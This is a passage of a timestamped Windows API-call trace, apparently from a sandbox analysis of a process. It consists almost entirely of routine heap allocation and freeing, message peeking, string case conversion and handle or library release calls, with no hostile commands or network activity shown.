out: lpsz="A0200C03718") returned 0xb [0164.703] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.703] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0164.703] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.703] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.703] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.703] CryptReleaseContext (hProv=0xab2890, dwFlags=0x0) returned 1 [0164.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0164.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0164.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0164.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0164.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0164.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0164.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0164.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0164.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0164.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0164.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0164.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0164.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0164.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0164.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0164.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0164.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0164.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0164.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0164.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0164.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0164.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0164.704] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.704] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0164.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.705] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0164.705] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0164.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0164.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0164.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0164.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.705] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0164.705] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0164.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0164.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0164.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0164.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0164.706] FreeLibrary (hLibModule=0x74d40000) returned 1 [0164.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0164.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0164.706] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0164.706] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0164.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0164.706] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0164.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0164.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0164.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0164.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0164.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0164.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0164.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0164.707] CloseHandle (hObject=0x170) returned 1 [0164.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0164.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0164.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0164.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0164.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0164.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0164.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0164.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0164.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0164.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0164.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0164.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0164.709] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0164.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0164.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0164.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0164.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0164.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0164.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0164.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0164.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0164.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0164.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0164.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0164.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0164.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0164.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0164.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0164.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0164.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0164.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0164.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0164.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0164.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0164.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0164.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0164.710] CloseHandle (hObject=0x1e8) returned 1 [0164.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0164.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0164.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0164.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0164.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0164.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0164.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0164.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0164.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0164.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0164.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0164.712] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0164.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0164.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0164.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0164.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0164.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0164.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0164.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0164.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0164.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0164.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0164.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0164.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0164.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0164.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0164.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0164.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0164.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0164.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0164.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0164.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0164.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0164.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0164.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0164.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0164.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0164.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0164.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0164.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0164.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0164.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0164.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0164.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0164.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0164.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0164.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0164.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0164.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0164.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0164.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0164.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0164.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0164.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0164.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0164.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0164.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0164.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0164.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0164.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0164.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0164.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0164.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0164.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0164.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0164.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0164.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0164.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0164.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0164.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0164.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0164.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0164.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0164.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0164.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0164.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0164.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0164.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0164.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0164.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0164.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0164.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0164.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0164.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0164.716] 